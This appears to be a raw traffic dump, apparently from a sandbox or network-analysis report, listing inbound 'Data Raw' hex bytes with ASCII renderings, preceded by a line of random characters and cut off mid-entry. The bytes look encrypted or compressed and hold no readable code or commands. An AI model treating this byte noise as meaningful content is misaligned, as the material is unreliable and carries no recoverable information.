uG;lR;1!Q=E:{uac\|n'eZa'3AI(MCTKto.Q\fH*gRESs/i0rn$m~z+!j_4V/TMXS?GzHkR8'5=e?eEO(HZb:3
2022-11-07 22:49:10 UTC	11849	IN	Data Raw: 0f 47 cb ec 62 09 a9 37 01 54 66 17 24 12 c8 8d 06 43 de e7 f9 a0 b9 0a af 33 29 2e aa 05 f5 63 e4 f9 6d bc 0d 35 94 48 6e 7d 4a 85 12 13 9b 45 81 15 76 b5 1f 47 00 14 e1 ce 6b 29 96 cc 86 f2 ad 2c 8c 0e ee c1 e1 18 8e 20 c9 1e 59 5d 75 e3 b1 d0 a6 68 2a 1e 6a 35 00 64 02 e2 c9 81 24 b9 12 2c 33 bd 76 b2 0c d2 a1 3a d3 a7 01 3c 4e 34 a6 b8 58 99 f5 22 02 1d 17 36 30 6d 5f 73 70 7f 6c 90 10 09 a7 3f 8f 58 39 a0 88 02 89 ac d4 50 a3 f5 00 6f 6a 0e db 1d 19 8e d5 b9 5e a8 46 3a 1c 57 34 11 86 d2 71 d2 99 aa a9 de 5a fd aa 04 80 68 3b a9 bf 83 b7 32 10 c8 d0 26 ab 01 f3 51 5d 9b 52 26 8f 67 03 4f 0f 6b 9e 57 c6 5b 1e bc 00 86 e3 9e 19 2a 64 84 9c 5d b0 53 7a 17 0c 4d c9 b9 1e a0 90 1b 6b b5 de 4a 8e b0 c8 95 b5 a4 c6 33 b8 2f f5 ab 28 51 4c 3e 89 2d 2f 83 c1 Data Ascii: Gb7Tf$C3).cm5Hn}JEvGk), Y]uhj5d$,3v:<N4X"60m_spl?X9Poj^F:W4qZh;2&Q]R&gOkW[d]SzMkJ3/(QL>-/
2022-11-07 22:49:10 UTC	11865	IN	Data Raw: 47 ca ac 54 30 06 40 d9 5d b9 08 0d 78 54 f6 06 e5 01 3c b9 6e 3d 0d 0b 71 48 f5 3e 95 12 f8 b1 f0 9c 16 84 e6 5c 0d 92 aa 12 eb 6d 16 30 61 43 0b fa 71 71 88 f3 ae 91 27 2b c3 41 0d f7 23 3a 20 12 cc 7c dc b1 df 1d c4 7f ae f6 59 ac 23 88 83 07 56 94 4f 65 28 a0 bd 47 30 1c 4e 1a cb 6f 59 9e 66 d0 63 07 bb ca e1 3e ff 72 37 0d 1f 0a d4 f8 3b 0d 30 98 5f 82 f6 1b c3 b8 83 62 24 d7 91 3e c2 76 31 47 11 40 09 e6 c6 c0 64 38 76 8f ba a2 fe dc c4 11 6c 41 ec ef 5b e1 4f 37 63 cc 87 e1 48 2f b0 05 86 f7 94 54 80 69 12 fd a3 f7 7c bc f6 cc 09 0f ba f6 43 fc 79 22 a5 f7 0f 85 8f 43 f9 68 09 30 99 21 e0 14 1b ef 66 56 8f 8a 9b 85 61 29 7c 9e 8f 5b fb 22 7e b6 77 f2 02 d5 9e 52 4b 5b fc c4 d2 4b 7e 58 c1 63 12 2a 92 3b 8a 9e 46 c5 b1 29 b4 0e c2 9a 66 6d c4 b4 85 Data Ascii: GT0@]xT<n=qH>\m0aCqq'+A#: \|Y#VOe(G0NoYfc>r7;0_b$>v1G@d8vlA[O7cH/Ti\|Cy"Ch0!fVa)\|["~wRK[K~Xc*;F)fm
2022-11-07 22:49:10 UTC	11881	IN	Data Raw: de 51 6c 31 98 7d 23 f9 6f f9 ef b2 96 6f 7b d1 ce a4 b0 0e cc d3 15 76 4e 89 4f 76 b4 99 ea 1b 33 7a f3 6c 65 3e db 2f 3c a7 44 da e0 23 4c 05 ac 6e 57 2c ef 66 73 b6 a8 0c 9c 52 46 4e 90 a1 d4 03 65 08 15 c8 df 15 20 e2 a2 bd 3e 55 d4 8a 1d 86 0b 02 99 b7 24 1c c3 ff 92 53 39 47 33 e0 7f 41 f8 0f 99 73 44 a2 32 85 86 a6 8a 51 fa 57 8a c6 2c 37 5f 9d e6 a3 76 d4 50 30 d9 82 50 91 e8 cc a1 bc a6 5b 67 4b bb 6b 09 c6 ee 29 30 29 55 30 45 97 a1 65 98 01 a8 6c 8c 81 83 2a 88 31 b9 45 ea 45 7f 2a 05 57 1b f7 5a 8a b4 9a 6f d4 2b a3 17 53 13 d5 b1 ac 99 f0 87 4a fb cc cc 9f 4f a2 6f c7 cb 85 7a 15 ad 6a b9 43 e9 d4 91 b1 e9 c2 95 b2 06 6b a1 8a e1 d5 66 95 3c f9 ee 1d 7e ec 9e e4 d1 ab 93 f3 63 e4 97 bd 50 00 b5 c5 d9 68 93 0c c2 76 cd a1 79 a6 c6 b6 da 09 c6 Data Ascii: Ql1}#oo{vNOv3zle>/<D#LnW,fsRFNe >U$S9G3AsD2QW,7_vP0P[gKk)0)U0Eel1EEWZo+SJOozjCkf<~cPhvy
2022-11-07 22:49:10 UTC	11897	IN	Data Raw: df c5 a1 d5 2c b9 52 f4 c9 21 41 0e 93 9d d8 3c 16 8e 0a f1 fe b9 47 33 54 06 cd 7d 47 ca 15 de 2f a4 59 2c f0 fb d5 e8 d5 e7 00 89 07 08 a8 3a ee f5 0b 82 24 f0 a7 33 a9 56 f3 40 ba ae ab e0 6a e6 07 04 11 c3 25 bc 9c 25 8c d8 e5 87 86 bc f4 f7 8d 71 62 e6 f3 b9 11 d6 4f 94 2c 47 4d cc f5 86 c6 42 87 8a eb 19 16 51 05 5e 63 28 ac ae 78 95 39 94 aa 78 ff c8 27 24 8c f1 b2 a1 7e 8c 90 24 5d c1 35 ce a9 08 28 dd 10 f6 3c 7a f6 dd eb 94 27 a0 d0 a4 44 8f 6a 49 da cf f0 b3 28 f9 79 52 3b a6 e0 42 b9 c3 9b 98 31 6f aa 70 37 79 0d 6d 40 19 b4 6e a9 05 b6 b6 9e cf 64 7a 8b 63 2a 6d f3 2b 17 90 5b 59 ca 89 d3 67 ed 8c 17 ac 0e fa 36 c0 86 2e 85 d8 a0 8c 41 f0 6e 91 12 ee e2 65 92 4f 3b 1c 31 aa 2e e2 6c 37 1e be f1 9d ff 5f 1b 3e df 1d 27 f9 ef 60 0d 64 7f 3c 6b Data Ascii: ,R!A<G3T}G/Y,:$3V@j%%qbO,GMBQ^c(x9x'$~$]5(<z'DjI(yR;B1op7ym@ndzc*m+[Yg6.AneO;1.l7_>'`d<k
2022-11-07 22:49:10 UTC	11913	IN	Data Raw: eb 39 f0 c7 a1 c7 ff e3 04 96 e3 e1 ee 19 04 84 c3 29 12 1b 95 42 8d 30 17 76 74 bf 65 ae e8 90 94 cf 4a d0 16 ba 4a af d8 04 c7 a4 a4 cd b8 b0 2b 3e 41 2e 75 19 f0 78 85 3d 13 0a bb 2a 0a 49 9e 91 0a 68 cc cc 09 98 be b1 b7 66 66 96 35 85 26 66 7a 4d 77 f0 de 5e 08 e1 e7 87 72 a7 85 96 54 d8 4c 3d 1f 0a 55 05 a8 02 02 11 7c 77 58 a3 5d 57 9d 97 0d 1e 8c 56 dc a1 4b 86 45 64 8f d8 15 3e 3a 28 10 ce b4 1e ab 4f c8 a1 d7 1b 44 f2 e7 7b a0 6a 74 25 a4 6d ca 5d c2 74 48 bc 7c dc 00 9e bf f9 20 91 dc de 89 7c 00 6c 93 0d a0 39 c8 e6 ea da 4c c9 0d 0a 95 a2 b3 13 06 27 dd 60 8d 47 a1 7d 92 71 2c 4c 19 b7 28 24 6c 9c 4c 04 01 5e 5d 7d 41 da 89 70 21 28 62 c6 cb ad b1 49 d9 85 08 ad 4a 40 da bd ef c2 fa f1 fb 98 55 80 de d0 a9 cc aa cc 2c 2f 99 08 e1 cf d0 43 a6 Data Ascii: 9)B0vteJJ+>A.ux=*Ihff5&fzMw^rTL=U\|wX]WVKEd>:(OD{jt%m]tH\| \|l9L'`G}q,L($lL^]}Ap!(bIJ@U,/C
2022-11-07 22:49:10 UTC	11929	IN	Data Raw: 91 be 08 35 f0 4f 51 81 b1 f2 ec c7 e8 3f 27 25 31 de 8f 9c 19 e5 b8 62 3c 22 9b 70 a7 33 ab 43 a2 7d 69 01 05 5d 3c 6d 8c 36 2a f3 0f 61 a2 c8 25 51 f5 0a 14 97 b4 42 5b 36 34 b9 b5 e7 9d 17 c8 3f 0b 13 fe 9e 23 4d f2 36 e5 d9 2f d2 d0 24 d6 d0 30 ae 68 e2 d3 ee 27 a4 44 95 fb a3 df 5d 9a 6a 98 b0 31 ed aa 9b da 49 90 29 7a 3f f5 2a 50 66 1d 37 00 d5 da b7 ee d2 c5 b6 4b 30 29 6b ab 38 c5 0d 04 76 40 0f ff d1 b3 ff ac 1b d2 82 4b 77 84 55 15 8f 0f ae 31 0e a7 b6 66 39 1f d8 79 01 19 82 69 d5 3f a9 22 18 a7 cf 8e 78 84 e2 5a 99 3a 44 ab 2d 71 f2 2b f8 79 c2 43 ac 3b f1 39 6e d6 f7 f2 4a 4f a4 2c 71 1a e1 bf 0d 9c f2 4b 16 58 bc f0 a7 d8 8a b5 90 7e f2 51 b4 b9 5c 54 cd 3b 91 3b a2 8c e0 af 56 5e e9 5a 62 4b 68 89 b1 4b 3c e5 7b cb 54 ed ed 80 4c 96 da 11 Data Ascii: 5OQ?'%1b<"p3C}i]<m6a%QB[64?#M6/$0h'D]j1I)z?Pf7K0)k8v@KwU1f9yi?"xZ:D-q+yC;9nJO,qKX~Q\T;;V^ZbKhK<{TL
2022-11-07 22:49:10 UTC	11945	IN	Data Raw: 28 16 4d bf 14 36 30 9d 74 93 b6 b9 12 2a 9a 26 56 b1 67 28 f0 e5 c7 0e 37 9c e9 8f d1 24 ed 6a 7f dd cd b8 2d 89 dd 52 1e a2 5c 62 c3 f3 24 9a 97 8c ed 4a 0c d2 6a c0 ad f0 d6 de c4 f1 54 ca 5f a5 73 29 38 11 5e cf 1a 30 d7 f8 59 cd f8 9b 5c be 6b b6 f6 b9 21 cd 5b 97 cc 91 8d b3 f2 e8 d0 3b 35 0b d9 f8 40 9d 0b ba 01 10 76 cb 87 dc f5 a4 51 73 94 ba 5a 05 61 2c 0f 47 27 24 65 2a cc 1f d8 73 d4 b3 1d 7c 69 3f 5f c3 8f 9c 61 ed fa 53 4c 02 7e 3e 56 1a b5 84 c4 29 52 e3 d8 c4 e3 cf dd 25 b2 3a 4d ff 94 e5 22 0e b1 b0 1d 20 8b 4d a1 78 fd 7b 8e 6b 73 1f 6a 76 7b ce a2 a3 cf 8c 4d 20 b0 f4 75 aa 75 a9 6e a2 5a 5e 72 55 40 c1 48 14 bc 05 82 83 eb 19 37 74 da 30 33 5c 4c aa 86 4e 21 9e 5b c3 36 2e 09 3d e1 9a e2 be e9 0c bd 4d c2 ae 02 c8 6a c7 a2 09 2d 0b 27 Data Ascii: (M60t&Vg(7$j-R\b$JjT_s)8^0Y\k![;5@vQsZa,G'$es\|i?_aSL~>V)R%:M" Mx{ksjv{M uunZ^rU@H7t03\LN![6.=Mj-'
2022-11-07 22:49:10 UTC	11961	IN	Data Raw: 86 a4 d5 04 54 74 17 ed e9 70 ba ae b2 ba b0 7d ed 38 58 25 81 37 ce e5 cb bf 61 f0 66 13 b9 92 59 fd 7b 21 a6 e8 c6 b2 19 c0 8d 51 1c 7a f7 fc 29 2a 8d 8c 12 8d c9 ed 76 c7 ab 01 f0 d7 0e 36 ce 9d 68 0c bf d7 f3 ec 77 d7 25 c3 25 24 d8 50 15 a8 52 5d 7b a8 b5 a2 4c e4 ab 4d c8 60 ce ec aa 49 fb da 91 67 37 f1 95 20 5d 48 a4 eb d6 6a 07 90 cc 1f 49 6e c8 a1 83 98 45 21 e3 8f f6 11 f3 98 f1 a8 eb 44 0d 20 0c f0 eb fa d4 f3 90 db 06 fb f3 7e 5f de 53 cf f9 1f df d9 6f a5 10 e8 b6 85 4b a8 cf df 4f 57 0c 6b f3 5c 11 b6 c3 63 94 bc b8 1f a0 c7 55 2b c8 ba e2 ea e4 e6 04 a0 81 bf 05 3e 4c 9d 70 29 f8 12 2f 9a 89 e3 85 9c 0b 4f 6d f9 d3 18 7c 35 fe c1 0e e9 61 4e 39 84 32 8e 9c dd 15 7a 47 d3 01 48 9c 1a 68 20 54 d0 ee e8 15 6a d1 33 f5 a1 3e c4 ac fb fc 15 4b Data Ascii: Ttp}8X%7afY{!Qz)*v6hw%%$PR]{LM`Ig7 ]HjInE!D ~_SoKOWk\cU+>Lp)/Om\|5aN92zGHh Tj3>K
2022-11-07 22:49:10 UTC	11977	IN	Data Raw: 69 ab b5 b5 91 20 d8 1e 8c 08 7a 2a 5b ba ab 8a 11 34 28 c1 4e 8e 88 b0 a9 0d 06 a9 18 a1 95 05 e4 75 1d 1c cf 74 2b c2 91 e8 c0 3c 85 f1 58 9e 93 74 1e c9 e7 30 54 58 b4 dc 86 12 f2 dc 13 e9 72 24 f2 0b 63 a2 a0 f2 20 f3 ea 8f ef 5b 71 f9 29 9c ec dd c8 d0 57 d0 80 2d 2e 8a 80 82 0e a4 a4 ff b1 b5 55 77 a6 60 05 03 9e a3 19 12 1f 22 8d 96 a3 48 1f 2c 62 4a 9a e4 a5 c4 0c 85 b9 b8 50 5b df 9f 7a b3 65 ef 1d 9b a7 4b 2b d5 e5 f7 39 c9 96 91 c0 29 7e 50 54 b0 a7 19 5f 25 d1 31 68 e4 2e cd 6d 20 3f e6 48 e2 50 88 a4 5b 1c 3c d5 c4 8c 3a 0a dd 8a 5f 53 75 ed 0e 84 b3 6a 1f 71 94 6d b3 32 f8 2b 57 65 8f ec 59 7b 40 e1 ba 04 66 a9 76 24 d0 d5 20 bc 08 98 17 c8 c3 19 c9 36 ea 59 48 12 df de d4 59 fe 7c 9a f5 17 f2 a7 64 c9 12 1e d3 bc a8 a7 29 90 db 96 e3 03 c8 Data Ascii: i z*[4(Nut+<Xt0TXr$c [q)W-.Uw`"H,bJP[zeK+9)~PT_%1h.m ?HP[<:_Sujqm2+WeY{@fv$ 6YHY\|d)
2022-11-07 22:49:10 UTC	11993	IN	Data Raw: 32 5c 53 d4 9f 9c 58 9e 8f ad 6a 31 93 bd bc 33 09 d2 44 a6 19 1e 72 7b 75 84 a9 52 04 56 30 94 26 99 ca c6 8f 75 09 d6 79 37 01 e6 4e f5 30 9b 55 1e 54 fe b6 2b 3c 42 a0 f4 64 8e a0 c6 c3 56 fb 23 40 d6 06 b2 96 ec 5f 11 48 9e d3 12 f7 a4 34 07 dd 8e 8d 20 a0 ab 10 5d 8d 7a 17 1e 76 56 f5 0f 6a 59 be 30 3a b5 ab 16 f4 19 5f 8d 5d 29 84 25 3c 33 01 6a f8 cc fe 06 1d e9 a3 8a 16 a1 97 ad 45 df 0c 95 0a fc 5d b3 92 a9 07 15 6a 99 ef 03 81 62 dd b5 86 17 3f 6d 31 76 50 60 88 5f 8a e9 00 bf d6 d8 3c 2d 7a 26 92 4d d4 67 bb 23 3c e4 32 f3 48 2b 7a 05 12 1d b4 39 9d 09 1c 31 7d e6 56 9b 28 7c bf 20 61 03 44 53 08 bf b2 16 04 c9 c6 2f a8 35 f5 b6 03 e8 90 72 4a d2 c5 4e 16 24 68 09 0b c6 c2 ad cf fa 34 ae 43 f6 99 78 cc 95 ec 1d 26 d6 b2 b1 d6 86 f8 e7 84 6c c5 Data Ascii: 2\SXj13Dr{uRV0&uy7N0UT+<BdV#@_H4 ]zvVjY0:_])%<3jE]jb?m1vP`_<-z&Mg#<2H+z91}V(\| aDS/5rJN$h4Cx&l
2022-11-07 22:49:10 UTC	12009	IN	Data Raw: 19 5c 23 8d 21 fd 48 8e 24 ea 25 01 e6 00 9e fa 56 aa 9d 59 16 23 7e 9c f5 97 7d e3 73 ad 27 d8 e0 24 64 96 ca e6 f8 5f a5 df 3e ac 47 5e ac 29 51 23 d7 48 46 02 7c de cc 81 1a 36 75 f5 67 c7 11 09 93 ee 9b 7f c7 25 13 9f 54 33 37 10 36 16 c3 e6 6c 57 89 0f 86 68 18 cd fc 47 48 61 7f 2c 19 0c da 15 0d 8b 78 36 45 ac e0 5e fe 5b 7d 88 51 eb f3 c0 81 8a c9 4a 47 15 fc 7e 52 90 58 c6 be f9 4f 92 7b 76 0e 8c 1a b2 e3 3a c5 af ab 66 bc 9e 94 86 ef e0 c3 5b 9d 57 f8 32 ec 16 8f 15 6f 92 67 4d 7d bd 65 2b be e3 69 bb 69 19 74 48 9a fa dd f5 56 be ff 0a f1 9f 47 4b d9 23 5d 18 f3 6e 72 0c ee 39 a2 ee c3 3b 3b 14 ca e1 af 0b 5d ac 72 16 92 f6 84 22 18 53 93 2b cf 1c 0c c2 81 29 5d 4b 2c 51 78 1f 29 f6 cc 31 10 f7 41 c7 f0 67 6b 98 bf 5c e9 b3 d8 5d 09 fd 0a 4d 7d Data Ascii: \#!H$%VY#~}s'$d_>G^)Q#HF\|6ug%T376lWhGHa,x6E^[}QJG~RXO{v:f[W2ogM}e+iitHVGK#]nr9;;]r"S+)]K,Qx)1Agk\]M}
2022-11-07 22:49:10 UTC	12025	IN	Data Raw: 90 36 bc 86 6d 36 5a 58 8d 4e cf c6 81 3f 88 6b 63 96 12 59 df d0 5d 66 cc 75 c4 51 42 43 b0 52 48 60 e2 e4 05 4a b4 8d f3 c0 ec c4 b9 93 7e 6d f1 2d 88 cf 86 62 ce 4e 72 2b a3 3c 9d 07 59 f3 ec fd a3 eb 97 04 ae 8e ec ee b0 c2 7e c6 ed a4 df 58 63 6e 9a 93 f5 2f b3 4a 83 d6 97 60 91 fd 02 05 99 1c d7 76 68 4c 5e b6 07 ba e9 67 68 24 2d 8d 99 0f a5 23 ec 41 ef b7 79 6e 6b d8 85 3d 0f 42 0b a2 52 bd d7 ad 1f 54 b1 19 a2 7c ca db 0e fa 83 13 b0 66 8b 23 d0 ff aa eb 43 9d 03 28 83 78 58 7a b2 81 ba ce ba 33 12 0e 16 3e 27 08 9a a7 01 8e c9 b9 38 60 c6 47 c7 e3 df e3 8b 8c e6 ab 10 1e b4 28 c9 8b 90 3e 79 9a 74 a5 a4 35 6a 0b ac 08 75 79 74 8a da 8d c3 70 e2 48 d4 6b f9 4b ab eb a9 89 88 62 26 a4 c9 2d b0 90 2d f0 13 15 09 40 96 ae e2 b7 89 f3 02 1d 65 36 20 Data Ascii: 6m6ZXN?kcY]fuQBCRH`J~m-bNr+<Y~Xcn/J`vhL^gh$-#Aynk=BRT\|f#C(xXz3>'8`G(>yt5juytpHkKb&--@e6
2022-11-07 22:49:10 UTC	12041	IN	Data Raw: a2 97 d0 34 11 06 fc 51 8e dc f6 c4 0d 38 5c 56 76 09 47 a1 6b fb 35 f5 43 12 d1 40 65 e6 13 62 f7 88 2b 6c 60 77 17 7e 26 11 f9 8f fd 10 d7 09 d0 f7 38 d3 ce 70 3a 12 86 85 98 fe 2d e0 2e 89 36 63 51 87 ab 23 83 65 18 d2 af f8 ea d5 cf e0 d9 aa d1 35 1e 6f a3 35 1a 9d 12 61 ad 3c 7e 11 27 b2 58 5e bd 73 9f 30 46 be c2 de 45 cd ed 1b 6a 13 70 cf 39 41 12 d7 ed 8b 53 1a e5 d0 05 bb d1 19 e2 44 d1 b8 ff 42 df 80 64 77 aa a9 72 8f 70 e0 60 b1 85 c6 2f 1e cc a4 d9 97 14 a4 b9 6f eb 6d b6 14 21 71 58 36 c8 cf 9c 8c 4a 8c d4 7b b0 77 3e 71 ee 2e f4 54 1f d4 23 45 47 7c 47 80 3e b2 3f 03 54 99 6c 1e 00 7c 11 b3 a9 4e 3e 3b 9e db 16 7d d4 24 8a d9 91 54 e9 e7 b6 f5 65 10 90 05 22 cc 28 61 6d ca 8b 85 14 ce 69 52 7b 38 7e e8 ec 61 a8 94 e5 06 fc 36 e7 95 a7 54 a9 Data Ascii: 4Q8\VvGk5C@eb+l`w~&8p:-.6cQ#e5o5a<~'X^s0FEjp9ASDBdwrp`/om!qX6J{w>q.T#EG\|G>?Tl\|N>;}$Te"(amiR{8~a6T
2022-11-07 22:49:10 UTC	12057	IN	Data Raw: b9 3e 50 6e 29 a7 d1 92 17 04 0e 4b 48 06 70 0c 1a 8c eb a6 01 fe ba be 55 93 25 ba 2f e9 67 52 53 60 49 30 9b bb 8a 82 f7 fd 6f b7 07 04 cc 14 7c 18 8a 74 44 e2 0d 32 59 2d 91 c7 bb c4 5a ac 1c af d3 38 33 8c 0d c2 6c 77 ee 0e 31 52 b0 96 25 21 9a da c0 e6 79 e1 98 fd 47 58 12 f8 ff 3d e5 8a c2 ff 62 3b 6f d6 2c 7d f8 95 07 a2 3e ad d7 4b 39 4d 02 f4 e7 66 59 7c 33 96 f6 0f 74 27 10 95 47 c3 4d db dd 71 e0 bd 72 51 80 63 3c e4 50 b7 7c ae fb 11 b1 77 c7 22 4c 1f 84 31 5b c0 97 81 0f 5d 97 64 1c b9 07 03 f7 79 cf 90 7d 93 73 97 d0 98 68 cf 56 2f a0 65 1e c4 63 29 76 c4 f9 8e 29 63 d0 ff 4e 12 ba 31 cc 67 84 aa fd 4c 6a b4 b1 ef 79 e0 01 e2 93 d0 53 a8 17 d1 1a 38 b0 51 f3 90 34 00 ad 19 40 28 89 df 16 73 da 88 97 90 c5 5b 2b 1c e6 c0 a0 d3 6e 92 f6 42 84 Data Ascii: >Pn)KHpU%/gRS`I0o\|tD2Y-Z83lw1R%!yGX=b;o,}>K9MfY\|3t'GMqrQc<P\|w"L1[]dy}shV/ec)v)cN1gLjyS8Q4@(s[+nB
2022-11-07 22:49:10 UTC	12073	IN	Data Raw: 4a 56 4c 33 43 21 8f de 30 82 aa f4 62 ff 1f a9 bc 15 77 fb 8e 14 fd ff 56 be fe ec 57 f4 4e 36 e2 c3 b1 f9 0a d0 e8 e8 78 b7 9e 63 e9 3e 0f 69 28 33 c7 b6 56 d2 53 3a e7 a3 bf 09 46 20 74 86 10 b6 9b 86 31 79 f5 5b cc 2e 25 b8 d7 33 d4 f5 36 8d 94 48 84 70 2e 05 b9 00 41 be 92 01 cf 87 00 08 b0 4d 01 4b f7 73 fc 51 c4 c0 6c c8 54 03 e9 14 1e 78 9e c2 34 09 e1 a8 c8 4e 03 f9 01 63 26 4e 0e b0 85 eb e9 9f 72 d1 4e fc cf 5d c9 a3 bb 03 e2 47 89 44 d3 16 54 01 5e 9e b6 a5 c5 ba 05 85 42 9c 10 f9 37 e7 b1 b7 6a e1 f1 a4 03 d0 8e c2 fc af 31 e1 ca a6 aa ab 44 a4 69 67 ce 9a 02 89 b7 9d dd ac ad 74 10 1e 95 e2 2b 82 86 17 29 53 b3 e7 87 a8 cf 05 19 e3 21 f5 b9 5d 81 22 94 5e e6 50 7e 72 7e 16 4d 22 6f a8 c3 11 a4 b4 b0 0f f4 30 c2 3b 3e ab f8 3e 38 bd e0 91 1f Data Ascii: JVL3C!0bwVWN6xc>i(3VS:F t1y[.%36Hp.AMKsQlTx4Nc&NrN]GDT^B7j1Digt+)S!]"^P~r~M"o0;>>8
2022-11-07 22:49:10 UTC	12089	IN	Data Raw: 55 f7 11 6f ae 59 33 14 71 f7 23 a3 7c cc 2e a4 7d 24 a1 95 54 19 1e 39 fe 1c 37 c6 50 4c 89 be 05 85 da db b7 f8 7a 22 19 ea 09 d7 04 79 22 66 d8 e9 25 1a 79 ac a7 3e a8 d6 81 f3 4f df ab bb d2 1f e9 14 81 13 f2 c5 56 29 7f 5f d3 6a 59 99 27 47 cb f5 f8 39 f9 70 e2 a1 1f 2f 8b 39 ea 3c 32 63 f3 a7 37 d0 9a 79 f0 f2 38 bf b8 f6 b1 d1 c5 28 c3 33 aa e6 69 37 ce 04 e9 a7 81 96 f7 4a fc 0b 46 64 96 b4 59 23 7d c5 ab 9a 5e 2d 90 a5 40 f6 25 d7 27 61 a6 f0 d3 68 25 40 6b 11 98 74 7d 1a 83 85 71 7c de 6f ea f9 24 6f ad c7 01 d7 f2 09 0c 69 56 ad 52 b1 de d2 3f 71 13 c7 cf 93 04 0b c1 37 6a 40 7f 62 ab 0b fb cc f5 78 47 87 40 ad c5 80 14 17 4a d0 9c 96 0b 7b c4 79 eb 8e 35 e4 18 4f b1 c2 68 47 d5 48 65 33 6c 9f fa d8 2f 3b cc d3 a9 33 15 08 01 84 fd e8 55 03 27 Data Ascii: UoY3q#\|.}$T97PLz"y"f%y>OV)_jY'G9p/9<2c7y8(3i7JFdY#}^-@%'ah%@kt}q\|o$oiVR?q7j@bxG@J{y5OhGHe3l/;3U'
2022-11-07 22:49:10 UTC	12105	IN	Data Raw: 7f 4b d0 3b 99 14 3d fa a8 11 a4 8b 96 de 86 f6 be b6 d0 92 3c f3 2b 30 ec 73 ad 35 af b1 67 8c fd 95 0c 49 f3 06 97 79 9d 1b e9 72 b4 d1 40 fb 72 31 9d dd 57 8a 47 03 8f 23 b5 0c a0 a0 8e 72 95 e6 c4 2a ba 13 37 ca 29 1a 28 64 df 28 16 ab 92 ac 51 09 92 f4 7d 64 cf c9 da c5 e6 c1 e2 f3 93 7c 20 ff b3 f4 6e e2 f7 c1 d8 f4 2e dc 65 88 4c 54 2b 84 3b ce 03 5b ca f2 e0 a3 34 a0 cb 39 4e 46 6f 98 db 67 36 ac 9a e3 f5 f1 fe db d1 70 fa 46 7a 4d 1a ff c9 fa 20 57 61 f0 15 0c 11 51 93 ea 04 b1 f5 2f 10 23 59 9a 08 e6 0b c4 91 83 35 d9 9b 27 68 35 7e 65 64 41 0c 8b 3e 70 65 71 a5 4f 83 65 67 44 9a f7 b0 64 ce 78 9e c2 d1 d9 57 2a 02 8c 34 aa b0 aa dc 99 b9 a2 8c 9f ce 9a 4d ba 74 2f 96 04 33 ea 81 30 ec 90 82 29 c9 9e 69 7a 7f 81 dd 64 61 af 07 7b 76 7f eb 91 12 Data Ascii: K;=<+0s5gIyr@r1WG#r7)(d(Q}d\| n.eLT+;[49NFog6pFzM WaQ/#Y5'h5~edA>peqOegDdxW4Mt/30)izda{v
2022-11-07 22:49:10 UTC	12121	IN	Data Raw: a8 88 8f 63 a0 77 7a e7 20 2c 87 79 19 bf 1c b3 de 63 2b 91 b4 76 c0 b6 c1 7c 29 aa c6 68 3e 6e fa 4a 67 e2 49 37 2e 10 59 12 d5 8a 95 95 06 df 9c a3 b5 72 b1 e2 18 10 13 d6 4b 3f eb 7a f0 ad 00 16 ae 17 be f1 2c 18 26 98 52 ba 4f 0c 8c d5 41 46 b2 33 3b bb 3c 3f 6a 58 63 53 b8 11 a1 d2 41 d8 b2 87 50 23 13 6a 15 84 2f 4b 29 a3 b5 b7 6e e3 f2 64 a4 23 a1 89 45 5f 8c 51 3e 79 2d 60 e9 56 f7 22 ed 60 4a 4a 80 de 52 9d 5d f3 5e e9 ad 77 66 6d d5 e2 4d f7 a9 d8 54 4a 91 ea 95 95 e0 32 e4 06 5c 9d e4 d1 d5 f2 50 1c 8d c6 2e 01 fa fd 41 15 3e 4b b9 a0 52 33 4c b8 48 60 8c 1a 4b 90 32 3f cb bb 2f e9 dc 94 b2 4e ff 69 7e a4 63 a9 8b f8 67 82 8c 7c 90 27 9f 62 f6 0c 5b db 03 45 77 2b cc 28 94 25 bf 44 cf 34 c0 3e 1c 14 e3 fb 1c 68 06 c8 e5 85 9e 29 04 6d ab 73 f4 Data Ascii: cwz ,yc+v\|)h>nJgI7.YrK?z,&ROAF3;<?jXcSAP#j/K)nd#E_Q>y-`V"`JJR]^wfmMTJ2\P.A>KR3LH`K2?/Ni~cg\|'b[Ew+(%D4>h)ms
2022-11-07 22:49:10 UTC	12137	IN	Data Raw: 40 56 dd f1 ad 90 bc 9a 76 17 8c 8c 28 3d 30 3e 1f 3c 99 74 23 02 07 78 c0 c3 2d 2e 3c 7e 7b 90 15 62 0f ef 16 3b 08 07 a8 df d4 42 05 ff f3 91 b0 29 e9 38 fd 50 1a 0e 49 c8 cc 0f d0 9c 69 7c 2c 07 0d fc 0d 06 3e 10 ee 77 05 8b ab 21 b4 43 3d c2 9f 9d 43 28 78 d5 0b 1e 78 a4 c7 7c a0 68 1f a9 73 9c 91 bc 44 c3 62 8c 8f bd 62 90 4f 56 ec c0 71 44 a8 26 f6 20 0b 0f 7d 73 40 8b 3d 23 f0 6e 3d 78 cd c9 41 48 8b 5f dd b5 bd 40 c8 68 c8 1b 24 f8 69 fc 83 d6 07 ea 37 72 7b b3 49 d9 bd 6e b0 e7 67 3a 90 3a 84 36 02 5e f2 2c 9c 27 a0 96 5f 9d 60 76 74 c2 2f 87 f3 64 20 b4 1c ae dd 32 0a 0e 58 c6 ac 90 ba 75 f0 59 73 47 9e 92 02 85 dc 11 f9 a1 29 c0 49 4b 2a 75 dc 28 4a 8a 5a bc 47 6c a0 17 a9 ef f9 80 9a 64 2d 1b 64 98 be 84 73 33 30 64 7b c7 02 a1 00 09 b5 d6 fc Data Ascii: @Vv(=0><t#x-.<~{b;B)8PIi\|,>w!C=C(xx\|hsDbbOVqD& }s@=#n=xAH_@h$i7r{Ing::6^,'_`vt/d 2XuYsG)IK*u(JZGld-ds30d{
2022-11-07 22:49:10 UTC	12153	IN	Data Raw: 92 a5 e7 f7 50 3c 70 ae 17 de e8 88 aa 2b fc 89 a8 64 4b 35 3d 91 9e 9b a2 be f5 04 84 00 a7 a7 31 a1 66 76 b9 65 9b 89 f4 20 a6 65 94 d3 7d 16 cf 1e 7b f2 76 5f 3e 1a 85 6a 97 32 0e 57 fd 1e 36 14 97 c8 5f 7b 35 96 10 69 a8 9d 7e 97 57 d2 80 d1 ce 3c bb 17 e3 b9 be b7 94 c6 f4 5a 5b d3 0a 38 63 8d 80 2e 2a 02 e6 d5 96 0f fe 51 4f 2b 44 92 a5 ea e5 75 32 84 c0 f8 06 f0 31 55 66 57 2a 02 71 35 07 2a 4d bb b4 ee ad 21 f4 99 3c 1f b2 f8 9f bc ee 02 f4 da d9 9b 3a 8f bd 6a e6 19 53 4f e0 cb a6 5c c9 5e 48 0e 0c a5 a9 f1 27 93 c3 f8 fc 4f 8b 88 fc 87 78 7a 09 60 1f 9c ae 7d 7e 4a 64 3b d3 54 19 87 66 29 